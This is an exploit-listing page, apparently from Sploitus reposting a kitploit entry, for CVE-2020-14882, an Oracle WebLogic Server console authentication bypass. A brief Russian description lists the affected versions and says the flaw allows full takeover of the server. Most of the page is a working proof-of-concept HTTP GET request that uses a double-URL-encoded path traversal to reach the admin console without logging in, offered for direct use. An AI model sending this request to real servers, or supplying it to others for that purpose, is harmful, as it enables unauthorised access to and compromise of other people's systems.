Sploitus

Exploit for CVE-2020-14882

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MURATAYDEMIR-CVE-2020-14882
**[CVE-2020-14882] ΠžΠ±Ρ…ΠΎΠ΄ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ Oracle WebLogic Server**

* * *

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π΅ Oracle WebLogic Server ΠΈΠ· состава Oracle Fusion Middleware (ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚: Console). Π—Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚Ρ‹ ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Π΅ΠΌΡ‹Π΅ вСрсии: `10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0` ΠΈ `14.1.1.0.0`. Π›Π΅Π³ΠΊΠΎ эксплуатируСмая ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ с сСтСвым доступом Ρ‡Π΅Ρ€Π΅Π· HTTP ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Oracle WebLogic Server. Π£ΡΠΏΠ΅ΡˆΠ½Ρ‹Π΅ Π°Ρ‚Π°ΠΊΠΈ с использованиСм этой уязвимости ΠΌΠΎΠ³ΡƒΡ‚ привСсти ΠΊ ΠΏΠΎΠ»Π½ΠΎΠΌΡƒ Π·Π°Ρ…Π²Π°Ρ‚Ρƒ Oracle WebLogic Server.

root@kitploit:~
    
    
    GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
    Host: vulnerablehost:7001
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,zh;q=0.9
    Connection: close
    

![Image of PoC](https://raw.githubusercontent.com/murataydemir/CVE-2020-14882/main/poc.png)